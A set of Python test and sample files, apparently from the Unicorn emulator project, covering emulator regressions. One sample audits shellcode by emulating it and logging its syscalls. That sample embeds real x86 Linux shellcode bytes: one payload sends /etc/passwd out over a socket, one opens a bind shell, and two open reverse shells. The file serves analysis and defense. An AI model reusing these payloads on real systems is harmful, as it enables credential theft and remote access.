import regress
from unicorn import *
from unicorn.x86_const import *

X86_CODE64 = b"\x90"  # NOP


class WriteBeforeMap(regress.RegressTest):
    def runTest(self):
        # Initialize emulator in X86-32bit mode
        mu = Uc(UC_ARCH_X86, UC_MODE_64)

        # memory address where emulation starts
        ADDRESS = 0x1000000

        # write machine code to be emulated to memory
        with self.assertRaises(UcError) as raisedEx:
            mu.mem_write(ADDRESS, X86_CODE64)

        self.assertEqual(UC_ERR_WRITE_UNMAPPED, raisedEx.exception.errno)


if __name__ == '__main__':
    regress.main()



# Moshe Kravchik

import binascii
import regress
from unicorn import *
from unicorn.arm_const import *

# enable VFP
ENABLE_VFP_CODE = (
    b"\x4f\xf4\x70\x03"  # 00000016    mov.w       r3, #0xf00000
    b"\x01\xee\x50\x3f"  # 0000001a    mcr         p15, #0x0, r3, c1, c0, #0x2
    b"\xbf\xf3\x6f\x8f"  # 0000bfb6    isb         sy
    b"\x4f\xf0\x80\x43"  # 0000bfba    mov.w       r3, #0x40000000
    b"\xe8\xee\x10\x3a"  # 0000bfbe    vmsr        fpexc, r3
)

VLD_CODE = b"\x21\xf9\x0f\x6a"  # 0000002a    vld1.8  {d6, d7}, [r1]
VST_CODE = b"\x00\xf9\x0f\x6a"  # 0000002e    vst1.8  {d6, d7}, [r0]

# memory address where emulation starts
ADDRESS = 0x10000
SCRATCH_ADDRESS = 0x1000


class SIMDNotReadArm(regress.RegressTest):

    def runTest(self):
        code = ENABLE_VFP_CODE + VLD_CODE + VST_CODE
        regress.logger.debug("Emulate THUMB code")

        # Initialize emulator in thumb mode
        mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, code)

        # map 10K scratch memory for this emulation
        mu.mem_map(SCRATCH_ADDRESS, 10 * 1024)

        # write dummy data to be emulated to memory
        mu.mem_write(SCRATCH_ADDRESS, b"\x01" * 64)

        # initialize machine registers
        for i in range(UC_ARM_REG_R0, UC_ARM_REG_R12):
            mu.reg_write(i, i - UC_ARM_REG_R0)

        mu.reg_write(UC_ARM_REG_R1, SCRATCH_ADDRESS)
        mu.reg_write(UC_ARM_REG_R0, SCRATCH_ADDRESS + 0x100)

        mu.reg_write(UC_ARM_REG_SP, 0x1234)
        mu.reg_write(UC_ARM_REG_D6, UC_ARM_REG_D6)
        mu.reg_write(UC_ARM_REG_D7, UC_ARM_REG_D7)

        regress.logger.debug(">>> Before emulation")
        regress.logger.debug("\tD6 = %#x", mu.reg_read(UC_ARM_REG_D6))
        regress.logger.debug("\tD7 = %#x", mu.reg_read(UC_ARM_REG_D7))

        for i in range(UC_ARM_REG_R0, UC_ARM_REG_R12):
            regress.logger.debug("\tR%d = %#x", (i - UC_ARM_REG_R0), mu.reg_read(i))

        addr = SCRATCH_ADDRESS
        data = mu.mem_read(addr, 100)
        regress.logger.debug("Memory at addr %#x: %s", addr, binascii.hexlify(data))

        addr = SCRATCH_ADDRESS + 0x100
        data = mu.mem_read(addr, 100)
        regress.logger.debug("Memory at addr %#x: %s", addr, binascii.hexlify(data))

        self.assertEqual(UC_ARM_REG_D6, mu.reg_read(UC_ARM_REG_D6))
        self.assertEqual(UC_ARM_REG_D7, mu.reg_read(UC_ARM_REG_D7))

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS | 0b1, ADDRESS + len(code))

        # now print out some registers
        regress.logger.debug(">>> After emulation")
        regress.logger.debug(">>> SP = %#x", mu.reg_read(UC_ARM_REG_SP))
        regress.logger.debug(">>> PC = %#x", mu.reg_read(UC_ARM_REG_PC))

        for i in range(UC_ARM_REG_R0, UC_ARM_REG_R12):
            regress.logger.debug("\tR%d = %#x", (i - UC_ARM_REG_R0), mu.reg_read(i))

        regress.logger.debug("\tD6 = %#x", mu.reg_read(UC_ARM_REG_D6))
        regress.logger.debug("\tD7 = %#x", mu.reg_read(UC_ARM_REG_D7))

        addr = SCRATCH_ADDRESS
        data = mu.mem_read(addr, 100)
        regress.logger.debug("Memory at addr %#x: %s", addr, binascii.hexlify(data))

        addr = SCRATCH_ADDRESS + 0x100
        data = mu.mem_read(addr, 100)
        regress.logger.debug("Memory at addr %#x: %s", addr, binascii.hexlify(data))

        self.assertEqual(mu.reg_read(UC_ARM_REG_D6), 0x0101010101010101)
        self.assertEqual(mu.reg_read(UC_ARM_REG_D7), 0x0101010101010101)


if __name__ == '__main__':
    regress.main()



import regress
from unicorn import *


# OS X: OK with 2047 iterations.
# OS X: Crashes at 2048:th iteration ("qemu: qemu_thread_create: Resource temporarily unavailable").
# Linux: No crashes observed.

class ThreadCreateCrash(regress.RegressTest):
    def test(self):
        for _ in range(2048):
            Uc(UC_ARCH_X86, UC_MODE_64)


if __name__ == '__main__':
    regress.main()



import regress
import sys
import unittest
from unicorn import *
from unicorn.arm_const import *

SHELLCODE = (
    b'\x03\xF0\x8F\xE0'  # 0001F894        ADD         PC, PC, R3
    b'\x0D\x07\x21\xF4'  # 0001F898        VLD1.8      {D0}, [R1]!
    b'\x0D\x07\x0C\xF4'  # 0001F89C        VST1.8      {D0}, [R12]!
    b'\x0D\x07\x21\xF4'  # 0001F8A0        VLD1.8      {D0}, [R1]!
    b'\x0D\x07\x0C\xF4'  # 0001F8A4        VST1.8      {D0}, [R12]!
    b'\x0D\x07\x21\xF4'  # 0001F8A8        VLD1.8      {D0}, [R1]!
    b'\x0D\x07\x0C\xF4'  # 0001F8AC        VST1.8      {D0}, [R12]!
    b'\x0D\x07\x21\xF4'  # 0001F8B0        VLD1.8      {D0}, [R1]!
    b'\x0D\x07\x0C\xF4'  # 0001F8B4        VST1.8      {D0}, [R12]!
    b'\x0D\x07\x21\xF4'  # 0001F8B8        VLD1.8      {D0}, [R1]!
    b'\x0D\x07\x0C\xF4'  # 0001F8BC        VST1.8      {D0}, [R12]!
    b'\x0D\x07\x21\xF4'  # 0001F8C0        VLD1.8      {D0}, [R1]!
    b'\x0D\x07\x0C\xF4'  # 0001F8C4        VST1.8      {D0}, [R12]!
    b'\x0D\x07\x21\xF4'  # 0001F8C8        VLD1.8      {D0}, [R1]!
    b'\x0D\x07\x0C\xF4'  # 0001F8CC        VST1.8      {D0}, [R12]!
    b'\x04\x00\x12\xE3'  # 0001F8D0        TST         R2, #4
    b'\x04\x30\x91\x14'  # 0001F8D4        LDRNE       R3, [R1],#4
    b'\x04\x30\x8C\x14'  # 0001F8D8        STRNE       R3, [R12],#4
    b'\x82\x2F\xB0\xE1'  # 0001F8DC        MOVS        R2, R2,LSL#31
    b'\xB2\x30\xD1\x20'  # 0001F8E0        LDRHCS      R3, [R1],#2
    b'\x00\x10\xD1\x15'  # 0001F8E4        LDRBNE      R1, [R1]
    b'\xB2\x30\xCC\x20'  # 0001F8E8        STRHCS      R3, [R12],#2
    b'\x00\x10\xCC\x15'  # 0001F8EC        STRBNE      R1, [R12]
)
BASE = 0x1F894
COPY_SRC = 0x1000
COPY_DST = 0x2000
COPY_LEN = 8
DATA = b'c8' * COPY_LEN


class ArmMemcpy(regress.RegressTest):

    @unittest.skipIf(sys.version_info < (3, 7), reason="requires python3.7 or higher")
    def test_arm_memcpy(self):
        uc = Uc(UC_ARCH_ARM, UC_MODE_ARM)

        uc.mem_map(COPY_SRC, 0x1000)
        uc.mem_map(COPY_DST, 0x1000)
        uc.mem_map(BASE & ~(0x1000 - 1), 0x1000)
        uc.mem_write(COPY_SRC, DATA)
        uc.mem_write(BASE, SHELLCODE)

        uc.reg_write_batch((
            (UC_ARM_REG_R12, COPY_DST),
            (UC_ARM_REG_R1, COPY_SRC),
            (UC_ARM_REG_R2, COPY_LEN),
            (UC_ARM_REG_R3, 0x24)
        ))

        # enable_vfp

        # coproc=15, is64=0, sec=0, CRn=1, CRm=0, opc1=0, opc2=2
        CPACR = (15, 0, 0, 1, 0, 0, 2)

        cpacr = uc.reg_read(UC_ARM_REG_CP_REG, CPACR)
        uc.reg_write(UC_ARM_REG_CP_REG, CPACR + (cpacr | (0b11 << 20) | (0b11 << 22),))
        uc.reg_write(UC_ARM_REG_FPEXC, (0b1 << 30))

        uc.emu_start(BASE, BASE + len(SHELLCODE))
        src = uc.mem_read(COPY_SRC, len(DATA))
        dst = uc.mem_read(COPY_DST, len(DATA))

        self.assertEqual(DATA, src)
        self.assertEqual(DATA, dst)


if __name__ == '__main__':
    regress.main()



import regress
from unicorn import *
from unicorn.x86_const import *


class WrongConditionalPath(regress.RegressTest):
    def test_eflags(self):
        code = (
            b'\x4d\x31\xf6'     #  xor    r14, r14
            b'\x45\x85\xf6'     #  test   r14d, r14d
            b'\x75\xfe'         #  jne    0x6
            b'\xf4'             #  hlt
        )

        uc = Uc(UC_ARCH_X86, UC_MODE_64)
        uc.reg_write(UC_X86_REG_RIP, 0x6000b0)
        uc.reg_write(UC_X86_REG_EFLAGS, 0x246)

        uc.mem_map(0x600000, 0x1000)
        uc.mem_write(0x6000b0, code)

        uc.emu_start(0x6000b0 + 6, 0, count=1)

        # Here's the original execution trace for this on qemu-user.
        #
        # $ SC='xor r14,r14; test r14d, r14d; jne $; hlt'
        # $ asm --context amd64 --format elf $SC > example
        # $ qemu-x86_64-static -d cpu,in_asm -singlestep ./test \
        #   | grep -E 'RFL|^0x'
        # 0x00000000006000b0:  xor    %r14,%r14
        # RIP=00000000006000b0 RFL=00000202 [-------] CPL=3 II=0 A20=1 SMM=0 HLT=0
        # 0x00000000006000b3:  test   %r14d,%r14d
        # RIP=00000000006000b3 RFL=00000246 [---Z-P-] CPL=3 II=0 A20=1 SMM=0 HLT=0
        # 0x00000000006000b6:  jne    0x6000b6
        # RIP=00000000006000b6 RFL=00000246 [---Z-P-] CPL=3 II=0 A20=1 SMM=0 HLT=0
        # 0x00000000006000b8:  hlt    
        # RIP=00000000006000b8 RFL=00000246 [---Z-P-] CPL=3 II=0 A20=1 SMM=0 HLT=0
        self.assertEqual(0x6000b0 + 8, uc.reg_read(UC_X86_REG_RIP))


if __name__ == '__main__':
    regress.main()



import platform
import regress
import sys
import unittest
from unicorn import *
from unicorn.arm_const import *
from unicorn.x86_const import *

# count down from maxint to zero
_VALID_CODE = (
    b'\x31\xc9'     #           xor     ecx, ecx
    b'\x49'         #  _top:    dec     ecx
    b'\xf3\x90'     #           pause
    b'\xe3\xfb'     #           jecxz   _top
    b'\xf4'         #  _end:    hlt
)

_INVALID_CODE = (
    b'\xff\xff'  # (invalid)
)

CODE = _VALID_CODE + _INVALID_CODE

BASE = 0x100000


class TestCtl(regress.RegressTest):

    def test_mode(self):
        uc = Uc(UC_ARCH_ARM, UC_MODE_BIG_ENDIAN)

        # changing cpu model to one that supports EB
        uc.ctl_set_cpu_model(UC_CPU_ARM_CORTEX_M0)

        # changing cpu model to one that does not support EB; this is expected to fail
        with self.assertRaises(UcError) as ex:
            uc.ctl_set_cpu_model(UC_CPU_ARM_CORTEX_A8)

        self.assertEqual(UC_ERR_ARG, ex.exception.errno)

        # make sure we stay with the configuration we set beforehand
        self.assertEqual(UC_ARCH_ARM, uc.ctl_get_arch())
        self.assertEqual(UC_MODE_BIG_ENDIAN, uc.ctl_get_mode())
        self.assertEqual(UC_CPU_ARM_CORTEX_M0, uc.ctl_get_cpu_model())

    @unittest.skipIf(sys.version_info < (3, 7), reason="requires python3.7 or higher")
    @unittest.skip('TO BE CHECKED!')
    def test_page_size(self):
        SIZE_4KB = 4 * 1024 ** 1
        SIZE_2MB = 2 * 1024 ** 2

        uc = Uc(UC_ARCH_ARM, UC_MODE_ARM)

        # set page size to 2 MiB; this should work
        uc.ctl_set_page_size(SIZE_2MB)

        # was it set properly?
        self.assertEqual(SIZE_2MB, uc.ctl_get_page_size())

        # set a page size which is not a power of 2
        with self.assertRaises(UcError) as ex:
            uc.ctl_set_page_size(SIZE_2MB + 0xbad)

        self.assertEqual(UC_ERR_ARG, ex.exception.errno)

        # are we still with the valid value?
        self.assertEqual(SIZE_2MB, uc.ctl_get_page_size())

        # force uc to complete its initialization by triggering a random api
        uc.ctl_flush_tb()

        # set a page size after uc has completed its initialization
        with self.assertRaises(UcError) as ex:
            uc.ctl_set_page_size(SIZE_4KB)

        self.assertEqual(UC_ERR_ARG, ex.exception.errno)

        # are we still with the valid value?
        self.assertEqual(SIZE_2MB, uc.ctl_get_page_size())

    def test_timeout(self):
        MILLIS_1S = 1000

        uc = Uc(UC_ARCH_X86, UC_MODE_32)

        uc.mem_map(BASE, 0x1000)
        uc.mem_write(BASE, CODE)

        # start a long emulation bound by timeout
        uc.emu_start(BASE, BASE + len(CODE), timeout=MILLIS_1S)

        # was timeout set properly? uc returns timeout in nanoseconds
        self.assertEqual(MILLIS_1S * 1000, uc.ctl_get_timeout())

        # no way we made it all the way down to zero
        self.assertNotEqual(0, uc.reg_read(UC_X86_REG_ECX))

    def test_exits(self):
        WRONG_EXIT = BASE + len(CODE)
        GOOD_EXIT = BASE + len(_VALID_CODE)

        uc = Uc(UC_ARCH_X86, UC_MODE_32)

        uc.mem_map(BASE, 0x1000)
        uc.mem_write(BASE, CODE)

        def __hook_code(uc, *args):
            ecx = uc.reg_read(UC_X86_REG_ECX)

            # 16 down to the count
            if ecx == 0xfffffff0:
                # fast-forward the counter and let it run for another 16 iterations
                uc.reg_write(UC_X86_REG_ECX, 0x10)

        uc.hook_add(UC_HOOK_CODE, __hook_code)

        # enable exits
        uc.ctl_exits_enabled(True)

        # fix the exit point so we don't reach invalid code
        uc.ctl_set_exits([GOOD_EXIT])

        # start emulation, setting a wrong stopping point that will get us to invalid code
        # since we enabled exits, the stopping point should be ignored
        uc.emu_start(BASE, WRONG_EXIT, count=1)

        # only one exit point was set
        self.assertEqual(1, uc.ctl_get_exits_cnt())

        # only one exit point, and it is the wrong one
        self.assertSequenceEqual([GOOD_EXIT], uc.ctl_get_exits(), int)

        # resume execution; rely on code hook to fast-forward the emulation
        # stopping point is ignored due to enabled exits
        uc.emu_start(BASE, WRONG_EXIT)

        # did we exit on the right place?
        # not failing on an invalid instruction is another good indication for that
        self.assertEqual(GOOD_EXIT, uc.reg_read(UC_X86_REG_EIP))

    @unittest.skipIf(sys.version_info < (3, 7), reason="requires python3.7 or higher")
    def test_tlb_mode(self):
        MAPPING_LO = 0x0000000001000000
        MAPPING_HI = 0x0010000000000000
        NOPSLED = b'\x90' * 8

        uc = Uc(UC_ARCH_X86, UC_MODE_64)

        uc.mem_map(MAPPING_LO, 0x1000)
        uc.mem_write(MAPPING_LO, NOPSLED)

        uc.emu_start(MAPPING_LO, MAPPING_LO + len(NOPSLED))

        # # we should be fine here
        # uc.emu_start(BASE, BASE + len(_VALID_CODE), count=1)

        uc.mem_map(MAPPING_HI, 0x1000)
        uc.mem_write(MAPPING_HI, NOPSLED)

        # this should prevent us from mapping to high addresses
        uc.ctl_set_tlb_mode(UC_TLB_CPU)

        # this should fail
        with self.assertRaises(UcError) as ex:
            uc.emu_start(MAPPING_HI, MAPPING_HI + len(NOPSLED))

        self.assertEqual(UC_ERR_FETCH_UNMAPPED, ex.exception.errno)

        # ------------------------------------------------------

        # this should allow us mapping to high addresses
        uc.ctl_set_tlb_mode(UC_TLB_VIRTUAL)

        # this should ok now
        uc.emu_start(MAPPING_HI, MAPPING_HI + len(NOPSLED))


if __name__ == '__main__':
    regress.main()



#!/usr/bin/env python
# Unicorn sample for auditing network connection and file handling in shellcode.
# Nguyen Tan Cong <shenlongbk@gmail.com>

import struct
import uuid
from unicorn import *
from unicorn.x86_const import *

SIZE_REG = 4
SOCKETCALL_MAX_ARGS = 3

SOCKET_TYPES = {
    1: "SOCK_STREAM",
    2: "SOCK_DGRAM",
    3: "SOCK_RAW",
    4: "SOCK_RDM",
    5: "SOCK_SEQPACKET",
    10: "SOCK_PACKET"
}

ADDR_FAMILY = {
    0: "AF_UNSPEC",
    1: "AF_UNIX",
    2: "AF_INET",
    3: "AF_AX25",
    4: "AF_IPX",
    5: "AF_APPLETALK",
    6: "AF_NETROM",
    7: "AF_BRIDGE",
    8: "AF_AAL5",
    9: "AF_X25",
    10: "AF_INET6",
    12: "AF_MAX"
}

# http://shell-storm.org/shellcode/files/shellcode-861.php
X86_SEND_ETCPASSWD = b"\x6a\x66\x58\x31\xdb\x43\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x68\x7f\x01\x01\x01\x66\x68\x30\x39\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x89\xc6\x6a\x01\x59\xb0\x3f\xcd\x80\xeb\x27\x6a\x05\x58\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80\x6a\x01\x58\x43\xcd\x80\xe8\xd4\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"

# http://shell-storm.org/shellcode/files/shellcode-882.php
X86_BIND_TCP = b"\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"

# http://shell-storm.org/shellcode/files/shellcode-883.php
X86_REVERSE_TCP = b"\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\x7f\x01\x01\x01\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"

# http://shell-storm.org/shellcode/files/shellcode-849.php
X86_REVERSE_TCP_2 = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68\xc0\xa8\x01\x0a\x66\x68\x7a\x69\x66\x53\xfe\xc3\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80"

# memory address where emulation starts
ADDRESS = 0x1000000


# supported classes
class IdGenerator:
    def __init__(self):
        self.__next_id = 3  # exclude sdtin, stdout, stderr

    def next(self):
        next_id = self.__next_id

        self.__next_id += 1

        return next_id


class LogChain:
    def __init__(self):
        self.__chains = {}
        self.__linking_fds = {}

    def clean(self):
        self.__chains = {}
        self.__linking_fds = {}

    def create_chain(self, my_id):
        if not my_id in self.__chains:
            self.__chains[my_id] = []
        else:
            print("LogChain: id %d existed" % my_id)

    def add_log(self, id, msg):
        fd = self.get_original_fd(id)

        if fd is not None:
            self.__chains[fd].append(msg)
        else:
            print("LogChain: id %d doesn't exist" % id)

    def link_fd(self, from_fd, to_fd):
        if not to_fd in self.__linking_fds:
            self.__linking_fds[to_fd] = []

        self.__linking_fds[to_fd].append(from_fd)

    def get_original_fd(self, fd):
        if fd in self.__chains:
            return fd

        for orig_fd, links in self.__linking_fds.items():
            if fd in links:
                return orig_fd

        return None

    def print_report(self):
        print("""
----------------
| START REPORT |
----------------
""")

        for my_id, logs in self.__chains.items():
            print("---- START FD(%d) ----" % my_id)
            print("\n".join(logs))
            print("---- END FD(%d) ----" % my_id)

        print("""
--------------
| END REPORT |
--------------
""")


# end supported classes


# utilities
def bin_to_ipv4(ip):
    return "%d.%d.%d.%d" % (
        (ip & 0xff000000) >> 24,
        (ip & 0xff0000) >> 16,
        (ip & 0xff00) >> 8,
        (ip & 0xff))


def read_string(uc, addr):
    ret = ""

    c = uc.mem_read(addr, 1)[0]
    read_bytes = 1

    while c != 0x0:
        ret += chr(c)
        c = uc.mem_read(addr + read_bytes, 1)[0]
        read_bytes += 1

    return ret


def parse_sock_address(sock_addr):
    sin_family, = struct.unpack("<h", sock_addr[:2])

    if sin_family == 2:  # AF_INET
        port, host = struct.unpack(">HI", sock_addr[2:8])
        return "%s:%d" % (bin_to_ipv4(host), port)
    elif sin_family == 6:  # AF_INET6
        return ""


def print_sockcall(msg):
    print(">>> SOCKCALL %s" % msg)


# end utilities

# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" % (address, size))
    # read this instruction code from memory
    tmp = uc.mem_read(address, size)
    print(">>> Instruction code at [0x%x] =" % (address), end="")
    for i in tmp:
        print(" %x" % i, end="")
    print("")


# callback for tracing Linux interrupt
def hook_intr(uc, intno, user_data):
    global id_gen

    # only handle Linux syscall
    if intno != 0x80:
        return

    eax = uc.reg_read(UC_X86_REG_EAX)
    ebx = uc.reg_read(UC_X86_REG_EBX)
    ecx = uc.reg_read(UC_X86_REG_ECX)
    edx = uc.reg_read(UC_X86_REG_EDX)
    eip = uc.reg_read(UC_X86_REG_EIP)

    # print(">>> INTERRUPT %d" % eax)

    if eax == 1:  # sys_exit
        print(">>> SYS_EXIT")
        uc.emu_stop()
    elif eax == 3:  # sys_read
        fd = ebx
        buf = ecx
        count = edx

        dummy_content = str(uuid.uuid1()).encode("latin1")[:32]
        if len(dummy_content) > count:
            dummy_content = dummy_content[:count]

        uc.mem_write(buf, dummy_content)

        msg = "read %d bytes from fd(%d) with dummy_content(%s)" % (count, fd, dummy_content)

        fd_chains.add_log(fd, msg)
        print(">>> %s" % msg)
    elif eax == 4:  # sys_write
        fd = ebx
        buf = ecx
        count = edx

        content = uc.mem_read(buf, count)

        msg = "write data=%s count=%d to fd(%d)" % (content, count, fd)

        print(">>> %s" % msg)
        fd_chains.add_log(fd, msg)
    elif eax == 5:  # sys_open
        filename_addr = ebx
        flags = ecx
        mode = edx
        filename = read_string(uc, filename_addr)

        dummy_fd = id_gen.next()
        uc.reg_write(UC_X86_REG_EAX, dummy_fd)

        msg = "open file (filename=%s flags=%d mode=%d) with fd(%d)" % (filename, flags, mode, dummy_fd)

        fd_chains.create_chain(dummy_fd)
        fd_chains.add_log(dummy_fd, msg)
        print(">>> %s" % msg)
    elif eax == 11:  # sys_execv
        # print(">>> ebx=0x%x, ecx=0x%x, edx=0x%x" % (ebx, ecx, edx))
        filename = read_string(uc, ebx)

        print(">>> SYS_EXECV filename=%s" % filename)
    elif eax == 63:  # sys_dup2
        fd_chains.link_fd(ecx, ebx)
        print(">>> SYS_DUP2 oldfd=%d newfd=%d" % (ebx, ecx))
    elif eax == 102:  # sys_socketcall
        # ref: http://www.skyfree.org/linux/kernel_network/socket.html
        call = uc.reg_read(UC_X86_REG_EBX)
        args = uc.reg_read(UC_X86_REG_ECX)

        SOCKETCALL_NUM_ARGS = {
            1: 3,  # sys_socket
            2: 3,  # sys_bind
            3: 3,  # sys_connect
            4: 2,  # sys_listen
            5: 3,  # sys_accept
            9: 4,  # sys_send
            11: 4,  # sys_receive
            13: 2  # sys_shutdown
        }

        buf = uc.mem_read(args, SOCKETCALL_NUM_ARGS[call] * SIZE_REG)
        args = struct.unpack("<" + "I" * SOCKETCALL_NUM_ARGS[call], buf)

        # int sys_socketcall(int call, unsigned long *args)
        if call == 1:  # sys_socket
            # err = sys_socket(a0,a1,a[2])
            # int sys_socket(int family, int type, int protocol)
            family = args[0]
            sock_type = args[1]
            protocol = args[2]

            dummy_fd = id_gen.next()
            uc.reg_write(UC_X86_REG_EAX, dummy_fd)

            if family == 2:  # AF_INET 

                msg = "create socket (%s, %s) with fd(%d)" % (ADDR_FAMILY[family], SOCKET_TYPES[sock_type], dummy_fd)
                fd_chains.create_chain(dummy_fd)
                fd_chains.add_log(dummy_fd, msg)
                print_sockcall(msg)
            elif family == 3:  # AF_INET6
                pass

        elif call == 2:  # sys_bind
            fd = args[0]
            umyaddr = args[1]
            addrlen = args[2]

            sock_addr = uc.mem_read(umyaddr, addrlen)

            msg = "fd(%d) bind to %s" % (fd, parse_sock_address(sock_addr))
            fd_chains.add_log(fd, msg)
            print_sockcall(msg)

        elif call == 3:  # sys_connect
            # err = sys_connect(a0, (struct sockaddr *)a1, a[2])
            # int sys_connect(int fd, struct sockaddr *uservaddr, int addrlen)
            fd = args[0]
            uservaddr = args[1]
            addrlen = args[2]

            sock_addr = uc.mem_read(uservaddr, addrlen)
            msg = "fd(%d) connect to %s" % (fd, parse_sock_address(sock_addr))
            fd_chains.add_log(fd, msg)
            print_sockcall(msg)

        elif call == 4:  # sys_listen
            fd = args[0]
            backlog = args[1]

            msg = "fd(%d) listened with backlog=%d" % (fd, backlog)
            fd_chains.add_log(fd, msg)
            print_sockcall(msg)

        elif call == 5:  # sys_accept
            fd = args[0]
            upeer_sockaddr = args[1]
            upeer_addrlen = args[2]

            # print(">>> upeer_sockaddr=0x%x, upeer_addrlen=%d" % (upeer_sockaddr, upeer_addrlen))

            if upeer_sockaddr == 0x0:
                print_sockcall("fd(%d) accept client" % fd)
            else:
                upeer_len, = struct.unpack("<I", uc.mem_read(upeer_addrlen, 4))

                sock_addr = uc.mem_read(upeer_sockaddr, upeer_len)

                msg = "fd(%d) accept client with upeer=%s" % (fd, parse_sock_address(sock_addr))
                fd_chains.add_log(fd, msg)
                print_sockcall(msg)

        elif call == 9:  # sys_send
            fd = args[0]
            buff = args[1]
            length = args[2]
            flags = args[3]

            buf = uc.mem_read(buff, length)
            msg = "fd(%d) send data=%s" % (fd, buf)
            fd_chains.add_log(fd, msg)
            print_sockcall(msg)

        elif call == 11:  # sys_receive
            fd = args[0]
            ubuf = args[1]
            size = args[2]
            flags = args[3]

            msg = "fd(%d) is gonna receive data with size=%d flags=%d" % (fd, size, flags)
            fd_chains.add_log(fd, msg)
            print_sockcall(msg)

        elif call == 13:  # sys_shutdown
            fd = args[0]
            how = args[1]

            msg = "fd(%d) is shut down because of %d" % (fd, how)
            fd_chains.add_log(fd, msg)
            print_sockcall(msg)


# Test X86 32 bit
def test_i386(code):
    global fd_chains

    fd_chains.clean()
    print("Emulate i386 code")
    try:
        # Initialize emulator in X86-32bit mode
        mu = Uc(UC_ARCH_X86, UC_MODE_32)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, code)

        # initialize stack
        mu.reg_write(UC_X86_REG_ESP, ADDRESS + 0x200000)

        # tracing all instructions with customized callback
        # mu.hook_add(UC_HOOK_CODE, hook_code)

        # handle interrupt ourself
        mu.hook_add(UC_HOOK_INTR, hook_intr)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(code))

        # now print out some registers
        print(">>> Emulation done")

    except UcError as e:
        print("ERROR: %s" % e)

    fd_chains.print_report()


# Globals
fd_chains = LogChain()
id_gen = IdGenerator()

if __name__ == '__main__':
    test_i386(X86_SEND_ETCPASSWD)
    test_i386(X86_BIND_TCP)
    test_i386(X86_REVERSE_TCP)
    test_i386(X86_REVERSE_TCP_2)



import regress
from unicorn import *
from unicorn.x86_const import *

CODE_ADDR = 0x40000
CODE_SIZE = 0x1000

SCRATCH_ADDR = 0x80000
SCRATCH_SIZE = 0x1000

SEGMENT_ADDR = 0x5000
SEGMENT_SIZE = 0x1000

FSMSR = 0xC0000100
GSMSR = 0xC0000101


def set_msr(uc, msr, value, scratch=SCRATCH_ADDR):
    """
    set the given model-specific register (MSR) to the given value.
    this will clobber some memory at the given scratch address, as it emits some code.
    """
    # save clobbered registers
    orax = uc.reg_read(UC_X86_REG_RAX)
    ordx = uc.reg_read(UC_X86_REG_RDX)
    orcx = uc.reg_read(UC_X86_REG_RCX)
    orip = uc.reg_read(UC_X86_REG_RIP)

    # x86: wrmsr
    buf = b'\x0f\x30'
    uc.mem_write(scratch, buf)
    uc.reg_write(UC_X86_REG_RAX, value & 0xFFFFFFFF)
    uc.reg_write(UC_X86_REG_RDX, (value >> 32) & 0xFFFFFFFF)
    uc.reg_write(UC_X86_REG_RCX, msr & 0xFFFFFFFF)
    uc.emu_start(scratch, scratch + len(buf), count=1)

    # restore clobbered registers
    uc.reg_write(UC_X86_REG_RAX, orax)
    uc.reg_write(UC_X86_REG_RDX, ordx)
    uc.reg_write(UC_X86_REG_RCX, orcx)
    uc.reg_write(UC_X86_REG_RIP, orip)


def get_msr(uc, msr, scratch=SCRATCH_ADDR):
    """
    fetch the contents of the given model-specific register (MSR).
    this will clobber some memory at the given scratch address, as it emits some code.
    """
    # save clobbered registers
    orax = uc.reg_read(UC_X86_REG_RAX)
    ordx = uc.reg_read(UC_X86_REG_RDX)
    orcx = uc.reg_read(UC_X86_REG_RCX)
    orip = uc.reg_read(UC_X86_REG_RIP)

    # x86: rdmsr
    buf = b'\x0f\x32'
    uc.mem_write(scratch, buf)
    uc.reg_write(UC_X86_REG_RCX, msr & 0xFFFFFFFF)
    uc.emu_start(scratch, scratch + len(buf), count=1)
    eax = uc.reg_read(UC_X86_REG_EAX)
    edx = uc.reg_read(UC_X86_REG_EDX)

    # restore clobbered registers
    uc.reg_write(UC_X86_REG_RAX, orax)
